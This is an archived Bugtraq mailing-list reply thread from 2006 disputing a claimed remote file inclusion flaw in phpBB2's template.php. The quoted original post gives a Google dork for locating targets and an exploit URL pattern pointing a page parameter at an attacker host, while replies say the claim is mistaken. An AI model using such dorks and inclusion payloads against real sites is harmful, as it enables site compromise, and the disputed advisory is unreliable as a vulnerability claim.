Bugtraq mailing list archives

Re: phpBB2 (template.php) Remote File Inclusion

From: "Jessica Hope" <jessicasaulhope () googlemail com>
Date: Mon, 5 Jun 2006 22:05:43 +0100

On the contaray, template.php is part of phpBB2, but unlike what this
"exploit" is saying, it isn't located in the root directory of a phpBB
install; it is located in /includes.

Jessica

On 6/5/06, ad () heapoverflow com <ad () heapoverflow com> wrote:

template.php is an addon and not part of phpbb2, noobs....


canberx () linuxmail org wrote:
> ********************************************************************
>
> *Title:
>
> *phpBB2 Remote File Include
>
> *
>
> *
>
> *Credit:
>
> *Canberx
>
> *
>
> *
>
> *Thanx:
>
> *Forewer-Partizan
>
> *
>
> *
>
> *Mail:
>
> *canberx () linuxmail org    www.canberx.tk
>
> *
>
> *
>
> *Google Dork:
>
> *Powered by phpBB (c) 2001, 2002 phpBB Group
>
> *
>
> *
>
> *Exploit:
>
> *www.target.com/[path_to_phpbb]/template.php?page=[attacker]
>
> *
>
> *
>
> *********************************************************************
>
>
> Plz Don't Hacked site if it already has been defaced :)
>
>
> *********************************************************************
>
>
> __________ NOD32 1.1578 (20060604) Information __________
>
> This message was checked by NOD32 antivirus system.
> http://www.eset.com
>
>
>
>

Current thread:

phpBB2 (template.php) Remote File Inclusion canberx (Jun 04)
- RE: phpBB2 (template.php) Remote File Inclusion Scrouaf _ (Jun 05)
- Re: phpBB2 (template.php) Remote File Inclusion ad () heapoverflow com (Jun 05)
  - Re: phpBB2 (template.php) Remote File Inclusion Jessica Hope (Jun 06)
  - Re: phpBB2 (template.php) Remote File Inclusion Aaron Klein (Jun 06)
  - Re: phpBB2 (template.php) Remote File Inclusion Paul Laudanski (Jun 06)